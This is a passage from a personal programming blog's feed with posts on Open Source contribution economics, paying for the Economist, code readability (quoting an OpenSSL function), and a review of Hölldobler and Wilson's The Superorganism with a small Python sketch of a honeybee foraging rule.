I'd argue that most of the institutional work in Open Source over the last few decades has focused on reducing <strong>C</strong> - a lot of the basic technology and accompanying social norms used in Open Source development (mailing lists, bug trackers, version control systems, communications protocols) is lubrication to reduce the cost of contributing. I think you could even make a plausible case that much of what drives the Internet is just a side-effect of Open Source projects trying to reduce <strong>C</strong>.</p> <p>Another interesting train of thought is spurred by the factor <strong>BN</strong> - the benefit of not contributing. This nicely illuminates the fundamental difference between commercial and individual contributors - for individual contributors without commercial interests, <strong>BN</strong> is almost always 0. For commercial contributors, however, this term can be large. Consequently, we would expect projects where commercial contribution is important to have measures that aim to reduce <strong>BN</strong> - penalties that minimise the benefit of not contributing to the project. The outstanding example here is the Linux kernel project, which has followed a very successful two-fold path to reduce <strong>BN</strong>. The first, of course, is licensing - the GPL imposes stiff penalties (paid in terms of public outcry and possible legal consequences) on those failing to contribute code back to the project under many circumstances. The terms of the GPL do not cover all types of use, however, so there is a second tier of operational penalties for code that is license compliant, but not contributed back to the project. 
To quote <a rel="external" href="http://en.wikipedia.org/wiki/Greg_Kroah-Hartman">Greg Kroah-Hartman</a> in a <a rel="external" href="http://howsoftwareisbuilt.com/2009/11/18/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer/">recent interview</a>:</p> <blockquote> <p>Because of our huge rate of change, [drivers] pretty much have to be in the kernel tree. Otherwise, keeping a driver outside the kernel is technically a very difficult thing to do, because our internal kernel APIs change very, very rapidly.</p> </blockquote> <p>It's interesting to consider whether this last penalty is intentional or not. There are good technical reasons not to make any stability guarantees for internal APIs, but at the same time I'm sure that many kernel hackers are very aware of the fact that a rapidly-changing internal API compels companies to contribute code. I don't think it's a coincidence that the most successful Open Source project in the world has adopted strategies to penalize potential contributors for not donating code to the community. Reducing <strong>BN</strong> is one of the reasons why Linux has a vastly greater commercial contribution than, say, FreeBSD, and is therefore a much more vibrant and active project.</p> Why I subscribe to the Economist 2009-11-08T00:00:00+00:00 2009-11-08T00:00:00+00:00 https://corte.si/posts/media/why-i-subscribe-to-the-economist/ <p><div class="media"> <a href="economist.jpg"> <img src="economist.jpg" /> </a> <div class="subtitle"> Economist </div> </div> <div class="media"> <a href="guardian.jpg"> <img src="guardian.jpg" /> </a> <div class="subtitle"> Guardian </div> </div></p> <p>I've been a long-time reader of two international papers - the <a rel="external" href="http://www.guardianweekly.co.uk/">Guardian Weekly</a> and the <a rel="external" href="http://www.economist.com/">Economist</a>. 
Over the last year, these two papers have had startlingly different performance results - the Guardian Media Group posted a record <a rel="external" href="http://www.pressgazette.co.uk/story.asp?storycode=44075">loss of $150 million</a> for the year ending in June, while the Economist reported a record operating <a rel="external" href="http://www.economistgroup.com/our_news/press_releases/2009/results_for_the_year_ended_march_31st_2009.html">profit of $92 million</a> in the year ending in March. I have played my own tiny part in producing this outcome. I used to buy both the Economist and the Guardian Weekly religiously every week - today, I'm a paid-up subscriber to the Economist, and no longer buy the Guardian at all. So, how did the Guardian lose my dime entirely, while The Economist converted me from a news-stand purchaser to a subscriber? The answer to the first part of the question is simple: I no longer buy the Guardian Weekly because most of their content is available on the <a rel="external" href="http://www.guardian.co.uk">Guardian website</a> for free (even the crosswords, which I still print out and do over breakfast). I just have no incentive to fork out money for a piece of paper containing articles I've already read. The Economist has played the game rather more cleverly. Editorial pieces that are likely to generate inbound links are released for free on their website, but the bulk of their factual reporting remains behind a paywall. This alone would not have been enough to induce me to part with my hard-earned doubloons - if they stopped there, I would probably just have switched to free (though probably lower quality) alternatives. They really hooked me by offering a complete, professionally read audio edition, delivered promptly through an RSS feed at the same time as the print edition. This means that my subscription buys me about 8 hours of excellent audio content every week. 
By contrast, the rather quaint perk I would receive if I subscribed to the Guardian Weekly is a "digital paper" edition - essentially a series of large zoom-able images of the laid-out paper that I can't cut and paste from, link to, or even read comfortably.</p> <p>There's been a fair bit of head-scratching by pundits trying to explain The Economist's unexpected success. Michael Hirschorn from the Atlantic <a rel="external" href="http://www.theatlantic.com/doc/200907/news-magazines">just seems terribly confused</a>, claiming that the Economist "has never had much digital savvy", and concluding inexplicably that it must all just be luck. <a rel="external" href="http://www.niemanlab.org/2009/09/clay-shirky-let-a-thousand-flowers-bloom-to-replace-newspapers-dont-build-a-paywall-around-a-public-good/">Clay Shirky thinks</a> that the Economist is a niche financial news publication, and that its audience of "traders and business people" is willing to pay for specialist content when other people are not. Both of these opinions are quite wrong. The Economist has played a cunning strategic game with considerable <em>sang-froid</em>, and has shown much more savvy in producing monetizable online material than the Guardian (or indeed the Atlantic). Despite its name the Economist is in fact a general-interest international newspaper, with much more space devoted to news and politics than business and economics. The real answer is, I think, somewhat simpler: the Economist didn't abandon the basic rules of business - exchanging something of value for currency - when they moved online.</p> <p>All of this reminds me of a recent blog post by <a rel="external" href="http://blog.amandapalmer.net/post/200582690/why-i-am-not-afraid-to-take-your-money-by-amanda">Amanda Palmer</a>, lead singer for the Dresden Dolls. She's fairly well known for shamelessly monetizing her fanbase, an attitude she says has roots in her past as a street performer. 
She makes a convincing case that artists have historically been insulated by record companies from actually having to ask their fans for money. Putting your hat out and asking for coins is seen as grubby - an attitude that is going to have to change as record companies exit stage left and the connection between performers and audiences becomes more direct. A somewhat analogous thing is now happening to many news publishers - the most obvious alternative to selling eyeballs to advertisers is to put on a good show, and ask your audience for money. In my case, that's exactly what the Economist did - they offered me a distinctive benefit, and asked me to pay for it. And, apparently like many other Economist subscribers, I was happy to.</p> Reading Code: In praise of superficial beauty 2009-11-04T00:00:00+00:00 2009-11-04T00:00:00+00:00 https://corte.si/posts/code/reading-code/ <p>Every good programmer has gone through this. You discover a new tool, and it seems shapely and fit for purpose. You start using it, tentatively at first, gradually getting more and more used to its quirks and features. Over time, trust between you grows, and your casual friendship blossoms into something deeper. The program becomes part of that sacred subset of utilities you can't imagine yourself without. All is bliss... Then, one day, you decide to look at the code. Maybe you want to extend it, maybe you're just curious. The moment you fire up your editor on the first source file, you sense that something is wrong. Without reading a line, you notice a certain visual complexity to the code - something to do with deeply nested and over-long functions. Looking closer, you quickly realise that tangles of ifdefs snake through the source like a canker. Weird indentation and non-idiomatic constructs are everywhere. The project's structure sucks - there's no proper component isolation, its innards are a nest of subtle and devious co-dependencies. 
Beneath the skin of the streamlined program you thought you were using lies a grotesque, bloated, unmaintainable monstrosity. You're heartbroken - you've trusted this tool for years, and now it betrays you like this. It was all a lie - nothing will ever be the same again...</p> <p>I know from personal experience that this is a very traumatic process, so it's with great sympathy that I read a recent article by Marco Peereboom - an evocative and haunting lament with the poetic title <a rel="external" href="http://www.peereboom.us/assl/html/openssl.html">"OpenSSL is written by monkeys"</a>. Marco modestly claims not to be a great programmer, but he <em>is</em> a contributor to OpenBSD, a project that has a frankly <a rel="external" href="http://en.wikipedia.org/wiki/Theo_de_Raadt">psychotic</a> focus on code quality. So, let's see what a graduate of the OpenBSD Academy of Programming makes of the OpenSSL codebase, as illustrated by this illuminating extract:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="c"><span class="giallo-l"><span style="color: #D73A49;">#ifndef</span><span style="color: #6F42C1;"> OPENSSL_NO_STDIO</span></span> <span class="giallo-l"><span style="color: #6A737D;">/*!</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * Load CA certs from a file into a ::STACK. Note that it is somewhat misnamed;</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * it doesn&#39;t really have anything to do with clients (except that a common use</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * for a stack of CAs is to send it to the client). 
Actually, it doesn&#39;t have</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * much to do with CAs, either, since it will load any old cert.</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * </span><span style="color: #D73A49;">\param</span><span style="color: #E36209;"> file</span><span style="color: #6A737D;"> the file containing one or more certs.</span></span> <span class="giallo-l"><span style="color: #6A737D;"> * </span><span style="color: #D73A49;">\return</span><span style="color: #6A737D;"> a ::STACK containing the certs.</span></span> <span class="giallo-l"><span style="color: #6A737D;"> */</span></span> <span class="giallo-l"><span style="color: #6F42C1;">STACK_OF</span><span>(X509_NAME)</span><span style="color: #D73A49;"> *</span><span style="color: #6F42C1;">SSL_load_client_CA_file</span><span>(</span><span style="color: #D73A49;">const char *</span><span style="color: #E36209;">file</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span> BIO </span><span style="color: #D73A49;">*</span><span>in;</span></span> <span class="giallo-l"><span> X509 </span><span style="color: #D73A49;">*</span><span>x</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">NULL</span><span>;</span></span> <span class="giallo-l"><span> X509_NAME </span><span style="color: #D73A49;">*</span><span>xn</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">NULL</span><span>;</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> STACK_OF</span><span>(X509_NAME)</span><span style="color: #D73A49;"> *</span><span>ret </span><span style="color: #D73A49;">=</span><span style="color: #005CC5;"> NULL</span><span>,</span><span style="color: #D73A49;">*</span><span>sk;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span> sk</span><span style="color: #D73A49;">=</span><span style="color: 
#6F42C1;">sk_X509_NAME_new</span><span>(xname_cmp);</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span> in</span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;">BIO_new</span><span>(</span><span style="color: #6F42C1;">BIO_s_file_internal</span><span>());</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> ((sk </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #D73A49;"> ||</span><span> (in </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>))</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> SSLerr</span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #D73A49;">!</span><span style="color: #6F42C1;">BIO_read_filename</span><span>(in,file))</span></span> <span class="giallo-l"><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> (;;)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #6F42C1;">PEM_read_bio_X509</span><span>(in,</span><span style="color: #D73A49;">&amp;</span><span>x,</span><span style="color: #005CC5;">NULL</span><span>,</span><span style="color: #005CC5;">NULL</span><span>)</span><span style="color: #D73A49;"> ==</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> 
break</span><span>;</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span> ret </span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;"> sk_X509_NAME_new_null</span><span>();</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> SSLerr</span><span>(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> ((xn</span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;">X509_get_subject_name</span><span>(x))</span><span style="color: #D73A49;"> ==</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span style="color: #6A737D;"> /* check for duplicates */</span></span> <span class="giallo-l"><span> xn</span><span style="color: #D73A49;">=</span><span style="color: #6F42C1;">X509_NAME_dup</span><span>(xn);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (xn </span><span style="color: #D73A49;">==</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #D73A49;"> goto</span><span> err;</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #6F42C1;">sk_X509_NAME_find</span><span>(sk,xn)</span><span 
style="color: #D73A49;"> &gt;=</span><span style="color: #005CC5;"> 0</span><span>)</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> X509_NAME_free</span><span>(xn);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> else</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> sk_X509_NAME_push</span><span>(sk,xn);</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> sk_X509_NAME_push</span><span>(ret,xn);</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (</span><span style="color: #005CC5;">0</span><span>)</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"><span>err:</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> sk_X509_NAME_pop_free</span><span>(ret,X509_NAME_free);</span></span> <span class="giallo-l"><span> ret</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">NULL</span><span>;</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (sk </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> sk_X509_NAME_free</span><span>(sk);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (in </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> BIO_free</span><span>(in);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (x </span><span style="color: #D73A49;">!=</span><span style="color: 
#005CC5;"> NULL</span><span>)</span><span style="color: #6F42C1;"> X509_free</span><span>(x);</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> (ret </span><span style="color: #D73A49;">!=</span><span style="color: #005CC5;"> NULL</span><span>)</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> ERR_clear_error</span><span>();</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span>(ret);</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">#endif</span></span></code></pre> <p>His objections boil down to the following:</p> <ul> <li>The indentation style is weird, and in many circumstances hard to parse.</li> <li>The project uses a mixture of CamelCase and underscore-based function naming.</li> <li>The error cleanup strategy is bizarre - using a goto to jump into code guarded by an "if(0)" is distinctly unlovely.</li> <li>In this example, the function name mis-characterises what the function actually does. The somewhat shame-faced comment doesn't fix the problem, it just makes it funny.</li> <li>The project suffers from ifdef-itis.</li> <li>Most importantly, the code does not "read" well. In this case, we find multiple levels of indirection, and no clear flow to the function.</li> </ul> <p>So, while Marco's problem <em>started</em> with the project's shoddy documentation and API, his actual code criticism focuses on issues that are apparently superficial. He hasn't discovered a substantive bug or architectural weakness in the snippet above. Instead, what matters to him are simple virtues like consistency, style, and readability. Marco is saying, in fact, that the OpenSSL code sucks because it lacks superficial beauty. I couldn't agree with this position more.</p> <p>I'm reminded of a recent blog post describing "the perfect interview question" for programmers: ask them what bothered them most when reviewing other people's code. 
The blogger argued that a response focusing on superficial code quality meant that the interviewee was obviously not an "architectural thinker", and was therefore a poor candidate. This is utter tripe. Good programmers know that a lack of superficial code quality and consistency is the <em>best</em> indicator of deeper systemic problems in a project. If you ever need a quick estimate of the quality of a codebase, this is what you should look at first. If you ever have to work on a project with poor code quality, fix the superficial issues first. Ugly code will obscure deeper architectural issues, increase defect rates, make code review hell, and make the project hard to refactor. This is advice so basic that it usually does not need to be given - good coders understand the importance of superficial beauty at such a deep instinctive level that they will feel <em>compelled</em> to fix cleanliness and neatness issues before working on deeper problems.</p> <p>Superficial beauty is not something that is discussed nearly enough in the Open Source world, so I'm going to don my flame-retardant poncho, and name some names. In keeping with this post's starting point, I'm going to focus on projects in C. Let's start with the ugly. The codebase for <a rel="external" href="http://www.vim.org/">Vim</a>, a tool that I spend hours using every day, turns out to be a frightening and inscrutable thicket of #ifdefs. The Linux kernel is immensely variable in quality - some of it is very good, some of it - especially less widely used drivers - is unspeakable. The <a rel="external" href="http://www.mutt.org/">mutt</a> codebase is pretty terrible, prominently featuring one of my pet bugaboos - mixing tabs and spaces, invisibly screwing up indentation depending on your editor configuration. 
The <a rel="external" href="http://www.wireshark.org/">Wireshark</a> packet sniffer - another project I use daily - is so bad that OpenBSD <a rel="external" href="http://www.openbsd.org/cgi-bin/cvsweb/ports/net/ethereal/Attic/Makefile?hideattic=0">opted to remove</a> it from their ports tree rather than encourage their users to use it. Wireshark wins a special prize for over-commenting. They've clearly abandoned all hope of communicating their intentions through the code itself, degenerating instead to things like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="c"><span class="giallo-l"><span style="color: #6A737D;">/* Now bump the count. */</span></span> <span class="giallo-l"><span>(</span><span style="color: #D73A49;">*</span><span>argc)</span><span style="color: #D73A49;">++</span><span>;</span></span></code></pre> <p>I'll end the post on a high note, with some examples of great code quality. OpenBSD is undoubtedly one of the pin-up projects of the Open Source world, featuring code that is almost supernaturally clean, consistent and direct. If you're interested in taking a look, I recommend starting with some of their recent daemon development - their <a rel="external" href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/smtpd/?sortby=date#dirlist">SMTP</a> and <a rel="external" href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/ntpd/?sortby=date">NTP</a> daemons are good candidates. Another excellent project to look at is the C Python interpreter, which shares many of OpenBSD's virtues. Note that I mean the interpreter itself - the standard library is unexpectedly variable in quality. A more obscure project with great code quality is the <a rel="external" href="http://plan9.bell-labs.com/sources/plan9/sys/src/">Plan9 operating system</a>. 
Sadly, Plan9 never took off (perhaps because it wasn't free software from the beginning), but the codebase illustrates many of the sound principles outlined by Kernighan and Pike - both of whom were involved in Plan9 - in <a href="https://www.amazon.com/Practice-Programming-Addison-Wesley-Professional-Computing/dp/020161586X">The Practice of Programming</a>.</p> <p><strong>edit:</strong> Meanwhile, over on <a rel="external" href="http://www.reddit.com/r/programming/comments/a0s6o/in_praise_of_superficial_beauty_a_followup_to/">reddit</a> dagbrown has pointed out <a rel="external" href="http://opensource.apple.com/source/procmail/procmail-1.2/procmail/src/procmail.c">procmail</a>, which turns out to be an absolutely unparalleled phenomenon. Go on, have a look - I dare ya.</p> Non-programming books for Programmers: The Superorganism, Hölldobler & Wilson 2009-10-25T00:00:00+00:00 2009-10-25T00:00:00+00:00 https://corte.si/posts/books/superorganism/ <div class="media"> <a href="https:&#x2F;&#x2F;www.amazon.com&#x2F;Superorganism-Beauty-Elegance-Strangeness-Societies&#x2F;dp&#x2F;0393067041&#x2F;ref=sr_1_1?dchild=1&amp;keywords=superorganism&amp;qid=1592693625&amp;s=books&amp;sr=1-1"> <img src="superorganism-cover.jpg" /> </a> <div class="subtitle"> Superorganism </div> </div> <p>It's impossible to talk about <em>The Superorganism</em> without first mentioning <a rel="external" href="http://en.wikipedia.org/wiki/Bert_Holldobler">Bert Hölldobler</a> and <a rel="external" href="http://en.wikipedia.org/wiki/E._O._Wilson">E. O. Wilson</a>'s most famous collaboration - a book called simply <em>The Ants</em>. I've been fascinated with ants since childhood, and <em>The Ants</em> is one of my favourite books - deep enough to be intellectually satisfying on almost any detail, and broad enough to be one of those rare books that summarizes nearly everything to be said about its subject. 
It's hard to avoid platitudes like "authoritative" and "magisterial" when talking about a book like this, so I will resort to a simple computer science analogy: <em>The Ants</em> is to the study of ants what <em>The Art of Computer Programming</em> is to the study of algorithms. Only more so, because unlike Knuth, Hölldobler and Wilson actually completed their survey in 1990. It should be no surprise then, that I had <em>The Superorganism</em> on pre-order as soon as I heard that Hölldobler and Wilson were publishing their first new book in almost two decades. <em>The Superorganism</em> expands on a theme that also lies at the heart of <em>The Ants</em> - the workings of insect societies. <em>The Superorganism</em> paints with a broader brush than its predecessor, touching frequently on the other great families of eusocial insects - termites, bees and wasps.</p> <div class="media"> <a href="atta_cephalotes.jpg"> <img src="atta_cephalotes.jpg" /> </a> <div class="subtitle"> Atta cephalotes, Costa Rica </div> </div> <p>If you haven't delved into the world of social insects before, you're in for a treat. The range and complexity of social insect behaviour can be weirder and more wonderful than anything found in science fiction. Consider, for example, the lives of what the authors call the "ultimate superorganism": the <a rel="external" href="http://en.wikipedia.org/wiki/Attini">Attine</a> leafcutter ants. The remarkable fact about the leafcutters is that they are farmers, cultivating vast fungal gardens that provide them with essential nutrients. These fungal gardens are grown on a substrate of leaf-matter, and leafcutters get their name from the fact that colonies cut up enormous quantities of leaves to transport back to their nests - one mature colony was estimated to harvest a leaf area of 4550 square meters per year. The fungus gardens are the lifeblood of the leafcutter colony, and they are tended with endless patience and skill. 
Leaves brought back to the nest are snipped up, molded into pellets, and carefully planted with fungal hyphae taken from elsewhere in the garden. Workers patrol the fungal gardens ceaselessly, weeding out foreign fungal strains and other contaminants. The ants secrete antibiotics that inhibit the growth of other fungi, and produce growth hormones that enhance the growth of their own strain. They wage an endless battle against <em>Escovopsis</em>, a parasitic species of fungus that specialises in invading Attine leafcutter gardens. Remarkably, an important part of their arsenal is a second symbiont: a bacterium that only occurs on the cuticle of leafcutter ants, which produces powerful antibiotics specific to the fungal pest. The ants grow these bacterial weapons on special patches of cuticle, modified specifically to house them. There is also a degree of communication between the ants and their garden fungus. Leafcutter ants are sensitive to the chemical signals released by distressed fungus, and learn to avoid food that harms their gardens. When a new queen leaves the nest to mate and establish a colony of her own, she carries a sample of the fungus from her parent colony in a cavity next to her oesophagus. Once she has found a likely nesting spot, she spits out the fungal sample, and tends the growing cultivar as closely as she does her own offspring, feeding it with secreted fluid, while she herself subsists off her own bodyfat. Once the first brood of workers has been raised, the queen assumes her proper position as the egg-laying machine at the center of the colony, feeding on unfertilized eggs laid by her workers. If her colony is successful, she will produce about 20 eggs a minute, 24 hours a day, resulting in between 150 and 200 million offspring during her life. The colony can consist of several million ants at any one time. This population is housed in a colossal nest - one typical example had 1920 chambers with 238 fungus gardens. 
To build it, the ants had to shift 40 tonnes of soil. The nest itself is designed to provide optimal ventilation and humidity for the fungal gardens, and is continually adjusted by the ants to achieve the right conditions. Stretching out from the nest is a set of foraging tunnels that surface into a web of trunk routes along which leaf material is brought back to the nest. Trunk routes are meticulously maintained, with "road workers" clearing debris and encroaching vegetation. Within the ant population there are a range of physical castes, each adapted to a specific set of jobs. The smallest workers maintain and patrol the fungal gardens. The largest are gigantic supersoldiers that specialise in deterring vertebrate predators. Underpinning all of this is a sophisticated chemical communication system, involving a huge array of pheromones, and an incredibly sensitive sensory system. Hölldobler and Wilson cite research that shows that one milligram of the trail pheromone of <em>Atta texana</em> is enough to lead a worker 60 times around the Earth.</p> <p>Ponder for a moment the immense behavioural complexity required to sustain a sophisticated insect civilization like this. There are an extraordinary number of behaviours that need to be optimized, many of which read like they are straight from the pages of a programming competition. Foraging strategies need to be devised to efficiently discover food sources. Once a food source is discovered, its value needs to be estimated, and the right fraction of the colony's labour pool needs to be allocated to exploit it. Throughput needs to be optimised by selecting the right leaf fragment size, while minimizing the significant energetic cost of cutting leaves up smaller than necessary. The cost of constructing and maintaining the web of trunk routes needs to be weighed against the efficiency benefits gained (it turns out that they can improve foraging speed tenfold). 
There are many, many other interesting sub-problems like these, and the colony solves them all admirably. The entire system reminds one of a super-complicated real-time strategy game, and we can be forgiven for suspecting that there must be some hyper-intelligent controller micromanaging a <a rel="external" href="http://starcraft.wikia.com/wiki/Zerg">Zerg-like</a> expansion of the nest. Here, however, we come to perhaps the most remarkable fact about social insects: their colonies are leaderless. There is no central strategist at all - their entire range of sophisticated behaviour is emergent, arising from the aggregate actions of many small simple units with only local information. And yet, millions of ants can act with such apparent coherence and purpose that biologists like Hölldobler and Wilson have started thinking of colonies as organisms in themselves - "superorganisms" that compete, mate, and strive for survival.</p> <p>Humanity has not yet learned how to cross the chasm that separates the individual ant from the superorganism. We've seen the early glimmers of technologically produced distributed systems - one thinks of things like the Internet, peer-to-peer networks, and maybe some nebulous social constructs like "the blogosphere". The fact is, however, that we are simply incapable of designing distributed systems that even begin to approach the robustness and intricacy of insect colonies. <em>The Superorganism</em> is certainly not a manual for applying insectoid principles of distributed engineering to technological problems. 
It is, however, the best available overview of the best distributed systems we know of, and for that reason alone should be on every intellectually curious computer scientist's bookshelf.</p> <h2 id="bees-resource-allocation-peer-to-peer-communication-and-tiered-architectures">Bees: resource allocation, peer-to-peer communication and tiered architectures</h2> <div class="media"> <a href="waggle-dance.jpg"> <img src="waggle-dance.jpg" /> </a> <div class="subtitle"> The essential form of the honeybee waggle dance, p. 170 of The Superorganism. Reproduced here with the kind permission of its creator, <a href='http://www.margynelson.com/RumfordGraphics-Front-Page.html'>Margaret Nelson</a> </div> </div> <p>That's all very exciting, but it's not very concrete. So, for the second part of this review, I'll look at one example of distributed problem solving covered in <em>The Superorganism</em>, and explore its fascinating parallels with computer science.</p> <p>The best-studied insect society is surely that of <em>Apis mellifera</em>, the honeybee. In 1947 <a rel="external" href="http://en.wikipedia.org/wiki/Karl_von_Frisch">Karl von Frisch</a> famously decoded part of the "dance language" of the honeybee, showing that the bee <a rel="external" href="http://en.wikipedia.org/wiki/Waggle_dance">waggle dance</a> was used to convey precise information about the distance, direction and quality of a food source to nearby bees. The amazing discovery that bees conveyed complex abstract notions of this type to each other gave us an early insight into the wonder of social insect communication. Over the years since von Frisch's discovery, it has gradually emerged that the waggle dance is just one of a complex set of signals used to implement a distributed resource allocation strategy inside the bee colony. 
The bees in a hive are loosely specialised into "foragers", who go out of the hive to gather food, and "nectar processors", who remain in the hive to receive nectar from incoming foragers for processing and storage. When a forager returns to the nest laden with pollen and nectar, it searches until it finds a free processor to accept its cargo. The first optimisation problem the hive faces is to balance these two populations of specialists, minimising the waiting time for foragers dropping off their cargos as well as idle time for processors waiting to accept them. The second optimisation problem arises from the fact that the supply of nectar sources is not constant - if a new grove of flowers in bloom is discovered, the hive has to divert resources to exploit it as quickly as possible, adjusting the number of foragers and processors to match. This is complicated by the fact that not all nectar sources are equal: some might be particularly rich, and therefore require more foragers to exploit. A particular bee hive might be extracting nectar from a number of flower patches at the same time, and foragers need to be allocated optimally, and continually re-balanced. Remarkably, the bee colony accomplishes these goals without any central co-ordination, using an entirely distributed algorithm. To see how they do this, we need to flesh out the bee dance language somewhat. 
Hölldobler and Wilson describe three basic bee dances:</p> <ul> <li><strong>Waggle dance</strong>: The famous dance discovered by von Frisch, which directs forager bees to a specific resource with precise information on the location and distance.</li> <li><strong>Shaking dance</strong>: Recruits more bees to foraging, sending them to the dance floor to look for waggle dancers.</li> <li><strong>Tremble dance</strong>: Induces waggle dancers to stop dancing, and recruits bees to nectar processing.</li> </ul> <p>These dances are signals that provide the communications framework for the "bee algorithm", sketched out by Hölldobler and Wilson in the following set of decision rules:</p> <blockquote> <p>1 | Not enough nectar collectors in the field? If yes, and you also have immediate knowledge of a producing flower patch, perform the waggle dance.</p> <p>2 | Is the flower patch rich or the weather fine or the day early or does the colony need substantially more food? Perform the dance with appropriately greater vivacity and persistence.</p> <p>3 | Not enough active foragers to send into the field? Perform the shaking maneuver.</p> <p>4 | Not enough nectar processors in the hive to handle the nectar inflow? Perform the tremble dance.</p> </blockquote> <p>So, how do bees decide if there are too many foragers or too many nectar processors, using purely local information? The answer is simple and elegant: if a returning forager experiences a wait time of 20 seconds or less before finding a nectar processor, it assumes that there is a surplus of processors and recruits more bees to foraging through the waggle dance. If it experiences a wait time of 50 seconds or more, it assumes that there are too many foragers, and uses the tremble dance to both reduce the number of foragers and increase the number of processors. 
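</p> <p>A minimal Python sketch of the waiting-time rule just described. The 20 and 50 second thresholds come from the text; the function name, the return values and the treatment of intermediate waits as "no signal" are assumptions made purely for illustration.</p>

```python
# Hypothetical sketch: names and the "no signal" middle band are assumptions.
SHORT_WAIT = 20.0  # seconds; at or below this, processors look plentiful
LONG_WAIT = 50.0   # seconds; at or above this, processors look scarce


def forager_signal(wait_seconds):
    """Pick a dance from the time a returning forager waited to unload."""
    if wait_seconds >= LONG_WAIT:
        # Long queue: too many foragers for the available processors.
        return "tremble"
    if wait_seconds > SHORT_WAIT:
        # Between the two thresholds: assume no recruitment signal at all.
        return None
    # Unloaded quickly: spare processing capacity, so recruit more foragers.
    return "waggle"
```

<p>The only input is the bee's own unloading delay, which is what keeps the rule entirely local.</p> <p>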
